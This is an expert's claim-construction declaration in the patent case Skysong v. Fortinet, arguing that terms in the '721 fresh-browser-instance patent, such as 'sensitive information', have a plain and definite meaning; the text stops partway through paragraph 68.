# Exhibit 2

**IN THE UNITED STATES DISTRICT COURT
FOR THE EASTERN DISTRICT OF TEXAS
MARSHALL DIVISION**

| | | |
|---|---|---|
| Skysong Innovations, LLC, | ) | |
| | ) | |
| *Plaintiff*, | ) | |
| | ) | |
| v. | ) | C.A. No. 2:25-VC-00098 |
| | ) | |
| Fortinet, Inc., | ) | **JURY TRIAL DEMANDED** |
| | ) | |
| *Defendant*. | ) | |
| | ) | |

**DECLARATION OF NENAD MEDVIDOVIC, PH. D.,
REGARDING CLAIM CONSTRUCTION**

1. I, Nenad Medvidovic, Ph.D., have been retained in the above captioned matter as an independent technical expert on behalf of Skysong Innovations, LLC ("Skysong"). I have also been retained in the *Inter Partes* Review proceedings related to the same patents identified below. I have submitted a prior declaration regarding claim construction in a related case between Skysong and CrowdStrike, Inc. and CrowdStrike Holdings, Inc. ("CrowdStrike"). Because there is a lot of overlap in the issues, I have incorporated my testimony from that declaration in large part.

2. I am being compensated for my work as a technical expert at my customary rate. My compensation does not in any way depend on the outcome of this matter, and I have no personal interest in the outcome of this matter.

3. I have personal knowledge of the matters set forth in this declaration and, if called upon to testify, I could and would testify competently hereto. I am over 18 years of age.

## I. QUALIFICATIONS

4. My qualifications as an expert are detailed in my curriculum vitae, which is attached as **Appendix A** to this declaration. **Appendix A** includes a list of all publications authored or co-authored by me in the previous 10 years.

5. A list of all other cases in which, during the previous four years, I testified as an expert at trial or by deposition, is provided as **Appendix B** to this declaration.

6. I received a Bachelor of Science degree in Computer Science, summa cum laude, from Arizona State University's Computer Science and Engineering department.

7. I received a Master of Science degree in Information and Computer Science from the University of California at Irvine's Information and Computer Science department.

8. I received a Doctor of Philosophy degree from the University of California at Irvine's Information and Computer Science department. My dissertation was entitled "Architecture-Based Specification-Time Software Evolution."

9. For over thirty years, my research has focused on software systems; their design, development, maintenance, and evolution; their individual building blocks and overall architectures; mechanisms for their implementation and deployment; and their critical properties, including security, trust, robustness, reliability, maintainability, etc.

10. I am employed by the University of Southern California ("USC") as a faculty member in the Computer Science Department and have been since January 1999. I am a tenured professor. Since July 2022, I have served as my Department's Chair. Between January 2009 and January 2013, I served as the Director of USC's Center for Systems and Software Engineering (USC-CSSE), a large research center

that involved the work of a number of USC faculty, students, and staff as well as several dozen industry partners.

11. I have created and/or taught undergraduate-, Master's-, and PhD-level courses in software engineering, software requirements, software architecture, and embedded systems for many years. As part of these courses, I have developed and taught modules, and created and guided projects that exposed students to the interplay between software and traditional computing devices on one hand, and a wide range of physical equipment on the other hand, including sensors, RFID systems and their integration into item tagging applications, cameras, mobile robots, and wearable computing devices.

12. I co-authored "*Software Architecture: Foundations, Theory, and Practice,*" a widely used textbook on software systems architecture initially published in 2009. The issues of security and trust are discussed throughout the book as guiding principles behind the design of modern software systems. Additionally, an entire chapter of the book is explicitly dedicated to this topic.

13. A critical aspect of all systems I have researched over the past three decades is system security. I have taught existing and developed new techniques for ensuring system security in distributed, mobile, and embedded settings. These techniques have spanned static program code analysis; dynamic monitoring, logging, simulation, emulation, and testing; and statistical analysis and algorithmic

prediction based on historical data gathered both at the architectural/design and implementation levels.

14. My most recent work has focused on building a framework for evaluating AI/ML techniques—especially those relying on deep neural networks (DNNs)—that purport to pinpoint the sources of security vulnerabilities in software systems. My team's most recent publication on this topic, at the 2025 International Conference on Software Engineering, presents a framework called VIPer, which identified key shortcomings in existing DNN-based vulnerability detectors by showing how they learn from spurious system features and can be "fooled" by amplifying such features in their training datasets. VIPer provides an alternative neural network-based solution that significantly outperforms the current state-of-the-art in detecting vulnerabilities in previously unseen software systems.

15. I have been designated a Fellow of the ACM. This distinction is extended to top 1% of ACM's members. I have also been elected a Fellow of the IEEE. Fellow of the IEEE is IEEE's highest grade; less than 0.1% of its membership earns this grade each year.

## II. BASES OF OPINIONS

16. The basis and reasoning of my opinions include my education, training, and experience as an engineer, including my decades of experience in computer

science. In conducting my analysis and forming my opinions, I have considered the materials listed below.

a. U.S. Patent No. 10,574,721 (the '721 patent) to Rida A. Bazzi, Mohsen Zohrevandi, filed Dec. 8, 2014, and issued on February 25, 2020), its provisional application No. 61/912,716, filed on December 6 , 2013, and its file history;

b. U.S. Patent No. 11,775,831 (the '831 patent) to Jae-sun Seo and Minkyu Kim, filed January 13, 2023, and issued on Oct 3, 2023, its provisional application No. 62/399,753, filed on Sep. 26, 2016, and its file history;

c. U.S. Patent No. 11,892,897 (the '897 patent) to Paulo Shakarian, et al., filed Oct. 26, 2018, and issued on Feb. 6, 2024, its provisional applications, and its file history;

d. U.S. Patent No. No. 10,313,385 (the '385 patent) to Paulo Shakarian, et al., filed Nov. 28, 2016, and issued on Jun. 4, 2019, its provisional application No. 62/261,200, filed on Nov. 30, 2015, and its file history;

e. IPR2025-01400, Paper 1 (CrowdStrike's Petition for *Inter Partes* Review against US Patent No. 10,574,721), Paper 8 (Skysong's Patent Owner's Preliminary Response), and Exhibit 2008 (Declaration of

Nenad Medvidovic Ph. D., in Support of Patent Owner's Preliminary Response);

f. IPR2025-01170, Paper 1 (CrowdStrike's Petition for *Inter Partes* Review against US Patent No. 11,892,897), Paper 10 (Skysong's Patent Owner's Preliminary Response), and Exhibit 2016 (Declaration of Nenad Medvidovic Ph. D., in Support of Patent Owner's Preliminary Response);

g. IPR2025-01397, Paper 1 (CrowdStrike's Petition for *Inter Partes* Review against US Patent No. 10,313,385) and Exhibit 2009 (Declaration of Nenad Medvidovic Ph. D., in Support of Patent Owner's Preliminary Response); and

h. any other materials referenced herein.

## III. LEGAL FRAMEWORK FOR CLAIM CONSTRUCTION

17. I am not an attorney and I am not providing any legal opinions. The legal concepts related to claim construction have been explained to me generally, but my opinions are of a technical nature and do not depend on my understanding of the relevant legal principles.

18. I understand that claim construction is a matter of law to be decided by the Court. I understand that the purpose of claim construction is to give a claim term the ordinary and customary meaning that it would be given by one of ordinary skill

in the art in light of the patent specification at the time of the invention, which is the priority date to which the patent is entitled. I understand that one purpose of claim construction is to assist the fact finder in understanding the meaning of claim terms.

19. I understand that the interpretation begins and remains primarily rooted in the patent's intrinsic evidence, which constitutes the "public record" and includes: (1) the claim language itself, read in light of the surrounding claims, specification, and prosecution history; (2) the specification, which serves as the best guide to the inventor's intended meaning and may act as a dictionary if terms are explicitly defined; and (3) the prosecution history, which guards against interpretations broader than what the patentee disclaimed to secure allowance.

20. I understand that claim construction begins with the language of the claims themselves. I also understand that the intrinsic evidence (and particularly the claims, the specification, and prosecution history) are the primary sources used in interpreting claim language.

21. I understand that if disputed language is clear on its face, the intrinsic evidence should be consulted to determine whether some deviation from the ordinary meaning of the claim language is warranted.

22. When the disputed claim language is not clear on its face, I understand that the intrinsic evidence should be used to resolve, if possible, the lack of clarity. I understand that the intrinsic evidence includes the specification, the prosecution

history, and references cited on the face of the patent. I also understand that the specification is the best evidence of what the patentee intended the term to mean when there is no clear meaning of a claim term, and that the prosecution history may also shed light on the meaning of ambiguous terms. However, I understand that it is improper to import limitations from the specification into a patent claim through claim construction.

23. I have been informed that sometimes the ordinary meaning of claim language as understood by a person of ordinary skill in the art may be readily apparent even to lay persons. I understand that claim construction in such cases, if necessary, involves little more than the application of the widely accepted meaning of commonly understood words. I understand that if a person of ordinary skill in the art would understand a term in its ordinary, everyday sense, there is no need to construe it.

24. I further understand that a patentee may act as his own lexicographer by giving a definition for a particular claim term. The special definition need not be express, but may be implied by the full specification or prosecution history.

25. I understand that if the intrinsic evidence fails to clearly disclose the meaning of a claim term, the court may look to extrinsic evidence outside the patent and prosecution history, such as expert testimony, treatises, and dictionaries.

26. I understand that a patent must be precise enough to afford clear notice of what is claimed and apprise the public of what subject matter is still open to them in a manner that reasonably avoids uncertainty. I understand that a claim term is indefinite if, when the term is viewed in light of the specification and prosecution history, it fails to inform one skilled in the art about the scope of the invention with reasonable certainty. The definiteness requirement must take into account the inherent limitations of language; reasonable certainty in light of the subject matter, and not absolute precision, is required.

27. I understand that a patent has several components, including an abstract, drawings, a written description detailing different embodiments of the invention (i.e., the specification), and numbered claims at the end of the patent. It is the numbered claims that define the metes and bounds of the properties that the patentee has the right to exclude others from infringing.

28. I understand that a patent may include two types of claims: independent claims and dependent claims. An independent claim stands alone and includes only the limitations it recites. A dependent claim can depend from an independent claim or another dependent claim and includes all the limitations that it recites, in addition to all of the limitations recited in the claim or claims from which it depends.

29. I understand that a person of ordinary skill in the art ("POSITA") is presumed to be aware of all pertinent prior art, think along the line of conventional

wisdom, and possess ordinary creativity in the field. I also understand that a POSITA is not a real individual, but rather a hypothetical individual having these qualities.

## IV. THE ’721 PATENT

### A. Technical Background

30. The ’721 patent is part of a broader ASU-originated cybersecurity portfolio managed by Skysong. The portfolio addresses complementary aspects of cybersecurity and security analytics, including secure browsing, threat mitigation, dark web intelligence labeling, vulnerability exploitation prediction, and efficient machine learning techniques used in modern security systems. It was developed by Arizona State University researchers as part of a broader research program addressing cybersecurity problems from multiple angles, including threat mitigation, secure browsing isolation, dark-web intelligence gathering and labeling, vulnerability exploitation prediction, and related machine-learning and computational techniques used in modern security systems.

31. My below discussion pertains to the state of the art at the time of the invention of the ’721 patent unless specifically indicated otherwise.

32. The ’721 patent, titled “*Systems And Methods For An Automatic Fresh Browser Instance For Accessing Internet Content*,” claims priority to provisional application No. 61/912,716, filed on December 6, 2013. ’721 patent at 1:8–10. The

patent addresses securing access to sensitive content on the web. *Id.* at abstract. Its approach automates transparent compartmentalization practices for accessing different kinds of content with different browser instances. *Id.*

33. The ’721 patent teaches “an automatic fresh browser instance (‘FBI’) system.” ’721 patent at 2:29–30. In one embodiment “the FBI system enables the processing of two types of sites for a novice user: sensitive sites and every other type of site. Access to a sensitive site is done through a dedicated FBI. Access to all other sites is done through separate browser instance(s) as it would be done without Auto-FBI. When a user attempts to access a sensitive website by clicking on a link or entering a URL directly in the address bar, an FBI is created to handle the access. When the user finishes accessing the sensitive site, the user can close the FBI or minimize it. If the user later attempts to access the sensitive site from another browser instance, a new instance is activated again, or, if there is an existing active instance for the site, that instance is used to process the request.” ’721 patent at 4:35–48. “In order to keep track of all active browser instances and their conflict of interest (‘COI’) classes, a daemon outside the browser keeps track of active instances and launches new instances as needed.” ’721 patent at 2:43–46.

34. The ’721 patent addressed the shortcomings of the prior art by “automat[ing] compartmentalization practices for accessing different kinds of content with different browser instances. The automation is transparent to the user

and does not require any modification of how non-sensitive content is accessed." '721 patent abstract.

35. The system has two main components. "One component, an enforcer, intercepts system calls and modifies them as needed to ensure that sensitive content is only accessed through the appropriate instance of the browser." '721 patent at 7:8–11. "Another component, an enabler determines when sensitive content is requested and, if needed, launches a new fresh instance of the browser to access the content." *Id*. at 7:11–14.

### B. A Person Of Ordinary Skill In The Art

36. My opinions, as they relate to the '721 patent in this declaration, are based on the understanding of a Person of Ordinary Skill in the Art ("POSITA") at the time of the invention of the claims in the '721 patent.

37. In assessing the level of skill of a POSITA, I have considered the type of problems encountered in the art, the prior solutions to those problems found in the prior art references, the rapidity with which innovations are made, the sophistication of the technology, the level of education of active workers in the field, and my own experience working with those of skill in the art at the time of the invention.

38. In my opinion, a person of ordinary skill in the art at the time of the filing of the '721 patent would have at least a Bachelor's degree in CS or computer engineering, and 2–4 years of experience working in the field of software

development, distributed systems, data mining, and cybersecurity. A graduate degree in CS, computer engineering, AI, cybersecurity, or software engineering may be substituted wholly or in part for work experience.

39. I am very familiar with this level of skill at the relevant time. Over my decades of experience, I have supervised and worked with engineers in the relevant fields having at least the level of skill identified above. In my opinion I qualify as a POSITA with respect to all three patents discussed herein at the time of invention.

### C. Claim Constructions

40. I understand that the words of a claim are generally given their ordinary and customary meaning, that is, the meaning that the term would have to a person of ordinary skill in the art in question at the time of the invention. My opinions below are to be understood in light of my technical analysis of each patent.

#### *1. "sensitive information presenting a security risk"*

41. I understand that Fortinet asserts that "sensitive information presenting a security risk" as set forth in Claim 1 of the '721 patent, and "sensitive information indicating that accessing the web content by the first browser instance presents a security risk" as set forth in Claim 16, are indefinite based on the argument that the patent provides insufficient guidance as to the objective boundaries of this claim language. I disagree for multiple reasons.

42. **<u>First</u>**, the invention relates to protecting sensitive information. What specific information a particular user considers "sensitive" is irrelevant in the context of the '721 patent. The steps of claim 1, read as a whole, confirm that the invention is all about the *<u>how</u>* of protecting sensitive information, not about the *<u>what</u>* constitutes sensitive information. Claim 1 simply requires that web requests are intercepted, and that any request to access sensitive information is quarantined into a separate secure browser instance. '721 patent, claim 1. Put simply, this does not require knowledge of "what" the sensitive information is any more than a "table standing on the floor" needs to know whether the floor is tile, hardwood, or polished concrete.

43. Indeed, the patent intentionally teaches that an "experienced user defines conflict of interest classes **300** in a classes file as illustrated in FIG. 3." '721 patent at 5:33–35. For example, "an experienced user might define a COI class that contains some specific financial institutions." *Id.* at 5:27–28. The patent even acknowledges that "For the experienced user , a non-judicious choice of classes can pose a security risk." *Id.* at 8:56–57. This is because experienced users are able to self-define sensitive information classes. Inclusion of a malicious site here would expose the user's information to attack. From this disclosure, a POSITA would understand that (1) the patent intentionally allows "sensitive information" to be a flexible concept to allow the user to make their own decisions, and (2) the patent is

agnostic as to what the user considers "sensitive information." The patent simply provides a sound framework to protect anything the user considered sensitive in a unique secure browser instance.

44. To implement its flexible security framework, the '721 patent uses the referenced Conflict Of Interest (COI) classes. Specifically, the patent discloses:

> To allow for using different browsers for different classes, e.g., using Google Chrome for e-commerce and Mozilla Firefox for banking, we specify the browser type rule that should be followed for each class with a type descriptor (that comes immediately after a in the sample file):
>
> 'F': Mozilla Firefox instance should be used
>
> 'C': Google Chrome instance should be used
>
> '=': the launched browser instance should be the same type as the launcher
>
> '!': the launched browser instance type should be different from that of the launcher
>
> '_': places no restriction on the type of the browser
>
> The implicit general class has the implicit type descriptor '_', so both Google Chrome and Mozilla Firefox can be used to browse websites from the general class. While Google Chrome and Firefox have been provided as examples, it is contemplated that any type of internet browser, or any browser accessible by a user, may be used.

'721 patent at 5:51–6:2.

45. The patent describes the use of these COI classes using the example of Figure 3, showing three exemplary COI class definitions. '721 patent at 6:3–25 and Fig. 3. The three COI classes have different type descriptors, which determine which browser type will be used for that class. "The example file shown in Fig. 3 has two

explicit COI classes [$C_1$ and $C_2$]. The first class $C_1$ **302** has type descriptor '!' and the second class $C_2$ **304** has type descriptor 'C." '721 patent at 6:3–6. This type descriptor determines which browser instance type is used for that particular class.

46. In one example, a user is browsing using Google Chrome. '721 patent at 6:8–9. First, "an instance of Google Chrome of the general class is created." *Id*. "The user can navigate to any site that is not listed in [$C_1$ and $C_2$**]** in that browser instance." *Id.* at 6:10–11. However, for any URL listed in class $C_1$ (such as www.bankofamerica.com), "a fresh instance of Mozilla Firefox will be created." *Id.* at 6:14. "That is because the type descriptor for [$C_1$] specifies that an instance with a different type from that of the launcher (Google Chrome in this example) should be used." *Id.* at 6:14–17. For any URL listed in class $C_2$ (such as www.ebay.com) on the other hand, " a new instance of Google Chrome will be launched to handle the request regardless of the browser type used to initiate the request." *Id.* at 6:21–25. Thus, browser instance type refers to the type of browser that is permitted or desired for the desired URL. This functionality enables the '721 patent to classify any sensitive information as a COI that requires a private browser instance. The central idea of the '721 patent is that "sensitive information" should be quarantined—in a sense—from any other online information by using a different browser instance to provide an extra layer of security. In my opinion, in light of the specification of the '721 patent, a POSITA would have had no issue understanding

the meaning of the term "sensitive information" (such as, e.g., banking information) within a reasonable scope because "sensitive information" is a well-known term of the art in the fields of computers and cybersecurity.

47. **<u>Second</u>**, the intrinsic evidence of the '721 patent confirms that a POSITA would understand the meaning of "sensitive information" with reasonable certainty. For example, the patent provides a simple self-explanatory example—the Bank of America website www.bankofamerica.com—which any reasonable user would consider "sensitive information. '721 patent at 4:54–64 and 6:14. An exemplary request to access that financial website generates a warning message that "[t]he website . . . requested . . . handles sensitive information" and that a "new browser instance will be opened to handle this request for security reasons." *Id.*, Fig. 1; 5:1–4; and 6:11–14 ("If the user tries to navigate to www.bankofamerica.com which is listed in C1 302, a fresh instance of Mozilla Firefox will be created to handle the request."). This confirms the first point above—the user decides what is sensitive, and the invention provides the protection framework. A POSITA would need no further information to understand this term in the context of the claimed invention.

48. This is confirmed by the file history, which explains that:

> In contrast [to the references cited by the Examiner], as clarified in the claims as amended, content classes of the subject application are based on security considerations associated with web content in order to restrict or limit web access to sensitive content within certain web browser instances.

Nov. 13, 2017 Office Action Response at 10. Based on these disclosures, a POSITA would have readily understood the meaning of the term "sensitive information" as a well-known term of the art in the field of computer- and cybersecurity.

49. Further, in a prior response, Applicant explained that "content classes of the subject application are based on security considerations to separate content that cannot be trusted from sensitive content to e.g. reduce the spread of malware." Aug. 21, 2017 Office Action Response at 8. This confirms that applicant sought to separate potential malware from "sensitive information," such as for example financial information.

50. Relatedly, materials cited on the face of the '721 patent discuss the term "sensitive information" or similar terms in a manner consistent with how the term is used in the '721 patent. *See* U.S. Patent No. 8,095,967 at 1:33-37 ("The process allows user/clients to utilize the information and characteristics stored in the website database to help to validate the identity of the website before passing sensitive information to the website such as authentication credentials."), 5:20-28 ("Generally, the process 1 is employed in cooperation with a user computer 3 to provide secure access over a universal computer network such as the Internet 5 to web sites storing information sensitive to a user of the computer 3, such as financial web sites 7 and 9. The process 1 functions to prevent attempted accesses to intended web sites 7 or 9 from being redirected to malicious or bogus web sites, such as web

site 13, through phishing or pharming attacks, or other malicious activities."); U.S. Patent No. 5,974,549 at 1:31-33 ("For example, a downloaded component can collect sensitive data and transmit it over the Internet to competitors or criminals.").

51. **Third**, extrinsic evidence also support this understanding. For example, the Microsoft Computer Dictionary, Fifth Edition, (excerpts attached as **Appendix C**) explains regarding "computer security" that "security can be maintained by requiring personnel to use passwords and by granting only approved users access to sensitive information." "Sensitive information" is also used when defining "Orange Book" and "Red Book."[1] *See* Microsoft Computer Dictionary, Fifth Edition at 121 ("sensitive information" used to define "computer security"), 381 ("sensitive information" used to define "Orange Book"), 443 ("sensitive information" used to define "Red Book").

52. This is also confirmed by a related publication by the inventors, which also interpret "sensitive information" as information the user wants to protect. Attached as **Appendix D** is Bazzi et al, *Auto-FBI: A User-Friendly Approach For Secure Access To Sensitive Content On The Web*, ACSAC '13: Annual Computer Security Applications Conference, December 9–13, 2013, Louisiana, New Orleans, USA[2],

---

[1] "Red Book" (Trusted Network Interpretation (TNI)) and "Orange Book" (Trusted Computer System Evaluation Criteria (TCSEC)) are Microsoft computer security standards.

[2] Available at https://dl.acm.org/doi/10.1145/2523649.2523683.

(discussing vulnerable applications that "have access to user's sensitive information and [] might leak this information").

53. As another example of evidence outside of the '721 patent demonstrating that a POSITA would have readily understood the term "sensitive information," the term is regularly used by third parties in patents without definition and without issue because, in my opinion, a POSITA would have understood the meaning of "sensitive information" within a reasonable scope without issue. For example, in U.S. Patent No. 9,197,628 (attached as **Appendix E**), a patent assigned to Fortinet, the term "sensitive information" appears at least 51 times within the patent's specification and claims. *See, e.g.*, '628 Patent at Abstract ("The rule includes a regular expression and/or a string that is configured to detect existence of ***sensitive information***. A packet originated by a host device is received. The packet is determined to be associated with the upper layer protocol. A command, request or method of the protocol is identified that is specified by or represented by the packet. The packet is scanned for ***sensitive information*** based on the rule. When the scanning results in a conclusion that ***sensitive information*** is contained within the packet, then the defined action is performed.") (emphasis added).

54. As another example, in U.S. Patent No. 9,660,958 (attached as **Appendix F**), another patent assigned to Fortinet, the term "sensitive information" appears at least 11 times within the patent's specification and claims. *See, e.g.*, '958 Patent at

9:7-16 ("At block 402, if a hidden data item is identified by the decoder, the hidden item is scanned locally based at least on one or more security policies of the network security appliance. For example, if a security policy is a web filter that blocks a website, then the decoded hidden data is scanned to check if the hidden data includes a URL associated with or redirecting to a blocked website. If a security policy is a ***sensitive information*** (e.g., social security numbers, credit card numbers, etc.) filter, the decoded hidden data is scanned for such ***sensitive information***.") (emphasis added).

55. The term "sensitive information" also appears in Fortinet-assigned patents U.S. Patent No. 10,354,088 (attached as **Appendix G**) and U.S. Patent No. 10,616,258 (attached as **Appendix H**). *See* '088 Patent at 1:37-42 ("Data privacy and data leak prevention (DLP) are therefore among the key concerns for any organization as computing devices within a network may contain sensitive data/information that, if not protected effectively, can be transferred to anyone and anywhere across the globe in very little time."); '258 Patent at 2:39-42 ("In a computer network, some computing appliances are considered core assets as they provide critical services or store sensitive information."). In addition, "sensitive data" appears at least 69 times in the '088 Patent. Again, these Fortinet-assigned patents further demonstrate that "sensitive information" is a well-known term and

consistent with the understanding of a POSITA, and furthermore are consistent with the ’721 patent’s Bank of America example.

56. In addition, Fortinet’s publications further demonstrate that “sensitive information” is well-known and understood by a POSITA. For example, in the blog post entitled “PII: Key Insights on Protecting Personally Identifiable Information”[3] (**Appendix I**), the terms for “sensitive information,” “sensitive data,” and related such as “Sensitive PII,” appear at least 14 times. Page 1 of this blog states: “Personally identifiable information (PII) refers to information employed by a company or organization to identify someone, make contact with them, or find them.” “There are two basic kinds of PII: non-sensitive and sensitive. Non-sensitive PII can be freely sent to other parties without being secured, with no harm resulting to the individual. Sensitive PII, on the other hand, has to be sent and kept in a secure form because if it were disclosed, considerable harm could befall the individual.” In my opinion, these Fortinet publication examples are consistent with the ’721 patent’s Bank of America example, and consistent with the understanding of a POSITA.

57. More Fortinet materials also refer to “sensitive information” or similar terms such as sensitive data. “Configuring sensitive data protection,” part of the

[3] Available at https://www.fortinet.com/resources/cyberglossary/pii.

FortiADC 7.2.6 Handbook[4] (**Appendix J**), states on page 1 that the "Data leak prevention (DLP) feature … provides desensitization and warning measures for sensitive information leaks on websites, such as SSN numbers and credit card information, as well as the leakage of sensitive keywords." "Data Loss Prevention (DLP) Services – FortiGuard"[5] (**Appendix K**), states on pages 1 and 2 that "The FortiGuard DLP Service is critical to ensuring sensitive data does not leak," and that certain features "Stop cybercriminals from stealing your sensitive," "Prevent breaches from within your organization by … others who have been given legitimate access to your sensitive information," and "Protect from negligent data exposure as a result of employees or contractors losing sensitive information." *See also* "Fortinet Security Vulnerability Policy"[6] (**Appendix L**) at 1 ("Fortinet adheres to the FIRST Traffic Light Protocol (TLP) v.2.0 labeling scheme for sharing of sensitive data when sensitive information is shared with us. Any sensitive non-public information about vulnerabilities is considered highly confidential, and only individuals who have a legitimate need to know and can add value to the remediation process may access this information until notification.."); "CIA Triad"[7] (**Appendix M**) at 3

---

[4] Available at https://docs.fortinet.com/document/fortiadc/7.2.6/handbook/718809/configuring-sensitive-data-protection.
[5] Available at https://www.fortinet.com/support/support-services/fortiguard-security-subscriptions/data-loss-prevention.
[6] Available at https://www.fortiguard.com/psirt_policy.
[7] Available at https://www.fortinet.com/resources/cyberglossary/cia-triad.

("Network-connected products should consider security from the design phase to limit attack surfaces. Failing to do so increases risks to sensitive information across interconnected systems."); "Critical Fortinet Flaws Under Active Attack"[8] (**Appendix N**) at 1 ("Attackers are targeting admin accounts, and once authenticated, exporting device configurations including hashed credentials and other sensitive information."). Again, these examples are consistent with the '721 patent's Bank of America example and with the understanding of a POSITA.

58. Additional materials from CrowdStrike further demonstrate that "sensitive information" is well-known and understood by a POSITA. For example, US Pat. No. 9,390,228, provides that:

> The UHE environment 100 described herein is designed to protect the privacy and confidentiality of electronic health records and other forms of sensitive information while also allowing such information to be securely shared with others.

U.S. Patent No. 9,390,228 at 15:5–9 (attached as **Appendix O**).[9] *See also* U.S. Patent No. 11,811,821 at 1:21–26 (**Appendix P**) ("Malware is, for example, used by cyber attackers to disrupt computer operations, to access and to steal sensitive information stored on the computer or provided to the computer by a user, or to

[8] Available at https://www.darkreading.com/cyberattacks-data-breaches/critical-fortinet-flaws-under-active-attack.

[9] CrowdStrike received an assignment for U.S. Patent No. 9,390,228 (as U.S. Application No. 14/539,614) "entered" on March 21, 2022 (signed by CrowdStrike on March 23, 2022), as shown by Reel/Frame 59539/0775.

perform other actions that are harmful to the computer and/or to the user of the computer."); US11,063,966 at 1:23–25 (discussing malware attempting to "access and to steal sensitive information stored on the computer or provided to the computer by a user"); *see also* June 30, 2025 blog post entitled "How CrowdStrike Traces Attack Paths to Sensitive Data in the Cloud"[10] (**Appendix Q**) at 5 ("Falcon Cloud Security with Attack Path Analysis is built to protect not just infrastructure but the sensitive data adversaries are after."); CrowdStrike Blog ("Data Privacy")[11] at 1 (**Appendix R**) (providing examples of "sensitive data" including: customer names, addresses, social security numbers, credit card numbers, health information, financial data, operational data, intellectual property and trade secrets). In my opinion, these examples are consistent with the '721 patent's Bank of America example, and consistent with the understanding of a POSITA.

59. Similarly, the National Institute of Standards and Technology defines "sensitive information" as the below on its website at https://csrc.nist.gov/:

> Information, the loss, misuse, or unauthorized access to or modification of, that could adversely affect the national interest or the conduct of federal programs, or the privacy to which individuals are entitled under 5 U.S.C. Section 552a (the Privacy Act), but that has not been specifically authorized under criteria established by an Executive Order or an Act of Congress to be kept classified in the interest of national defense or foreign policy.

---

[10] Available at https://www.crowdstrike.com/en-us/blog/crowdstrike-traces-attack-paths-sensitive-data-cloud/.

[11] Available at https://www.crowdstrike.com/en-us/cybersecurity-101/data-protection/data-privacy/.

https://csrc.nist.gov/glossary/term/sensitive_information at 1 (attached as **Appendix S**). This further demonstrates that, in my opinion, a POSITA would have understood "sensitive information" within a reasonable scope as claimed and described in the '721 patent.

60. **__Fourth__**, my opinion is corroborated by another POSITA, Dr. Erez Zadok, who provided an expert opinion in IPR2025-01400 of this patent on behalf of Petitioner CrowdStrike. Dr. Zadok understood this claim term, and identified the Bank of America example: "the '721 Patent describes a URL request to www.bankofamerica.com as 'sensitive' such that a new browser handles that request for 'security reasons.'" IPR2025-01400, EX1003 ¶157 (excerpts attached as **Appendix T**).

61. To meet this disclosure, Dr. Zadok identified a prior art reference disclosing "sensitive URLs in list $L_{i1}$ [which] are associated with sensitive information presenting a security risk, such as online banking websites." **Appendix T** ¶157. Thus, Dr. Zadok was able to identify exemplary "banking account websites" as sensitive information without any indefiniteness concerns. *Id.*

62. Thus, in light of the specification and prosecution history of the '721 patent and in the context of the relevant claims, a POSITA would readily understand the meaning of "sensitive information" sufficiently to practice the claimed invention. In fact, this term is so simple and self-explanatory even to a lay jury, that there is no

need to unduly complicate it with a construction. It should simply retain its plain and ordinary meaning.

### *2. "in order to manage according to the rules" (claims 7 and 12)*

63. Fortinet asserts that the phrase "in order to manage according to the rules" is indefinite, as part of the limitation "implementing a daemon, the daemon comprising a multi-threaded program executed outside the first browser instance that tracks active browser instances and launches a new browser instance ***in order to manage according to the rules***" shared between claims 7 and 12 (emphasis added). I disagree. In my opinion, a POSITA would readily understand this term to refer to the claimed "data defining rules or delegating web access" in claim 7 and "data" defining rules in claim 12 (*see also* dependent claim 18 ("the data further defines rules limiting web access")). This is one of the fundamental concepts of the invention, which utilizes a set of rules for segregating "sensitive" user information of known safe sources (such as for example the user's financial information) from everything else (which may include malware). To "manage according to the rules" simply means that the software enforces the pre-defined rules to effect the security framework.

64. To implement this rule-base security framework, the '721 patent teaches "an automatic Fresh Browser Instance ('FBI') system." '721 patent at 2:29–30. "The FBI system enables the processing of two types of sites for a novice user:

sensitive sites and every other type of site." *Id.* at 4:35–38. To achieve this, the invention defines a simple rule set: access to a sensitive site is allowed only through a dedicated FBI; while access to all other sites is allowed through separate browser instance(s) as it would be without Auto-FBI. *Id.* at 4:38–40. When a user attempts to access a sensitive website by clicking on a link or entering a URL directly in the browser address bar, an FBI is created to handle the access according to the rules. *Id.* at 4:40–43.

65. "Alternatively, for more experienced users, a nuanced usage model is employed by the FBI system that allows users to define simple yet powerful security preferences to allow them to access multiple sites in the same conflict of interest (COI) instance. *Id.* at 2:62–66. These security preferences are the rules by which the security framework manages user internet web access.

66. To implement its flexible security framework, the '721 patent uses the referenced Conflict Of Interest (COI) classes. Specifically, the patent discloses:

> To allow for using different browsers for different classes, e.g., using Google Chrome for e-commerce and Mozilla Firefox for banking, we specify the browser type rule that should be followed for each class with a type descriptor (that comes immediately after a in the sample file):
>
> 'F': Mozilla Firefox instance should be used
>
> 'C': Google Chrome instance should be used
>
> '=': the launched browser instance should be the same type as the launcher

> '!': the launched browser instance type should be different from that of the launcher
>
> '_': places no restriction on the type of the browser
>
> The implicit general class has the implicit type descriptor '_', so both Google Chrome and Mozilla Firefox can be used to browse websites from the general class. While Google Chrome and Firefox have been provided as examples, it is contemplated that any type of internet browser, or any browser accessible by a user, may be used.

'721 patent at 5:51–6:2. A POSITA would understand that this is the rule set by which the invention operates.

67. The patent describes the use of the rules defined by these COI classes using the example of Figure 3, showing three exemplary COI class definitions. '721 patent at 6:3–25 and Fig. 3. The three COI classes have different type descriptors, which determine which browser type will be used for that class. "The example file shown in Fig. 3 has two explicit COI classes [$C_1$ and $C_2$]. The first class $C_1$ **302** has type descriptor '!' and the second class $C_2$ **304** has type descriptor 'C." '721 patent at 6:3–6. This type descriptor determines which browser instance type is used for that particular class.

68. In one example, a user is browsing using Google Chrome. '721 patent at 6:8–9. First, "an instance of Google Chrome of the general class is created." *Id.* "The user can navigate to any site that is not listed in [$C_1$ and $C_2$**]** in that browser instance." *Id.* at 6:10–11. However, for any URL listed in class $C_1$ (such as www.bankofamerica.com), "a fresh instance of Mozilla Firefox will be created." *Id.*

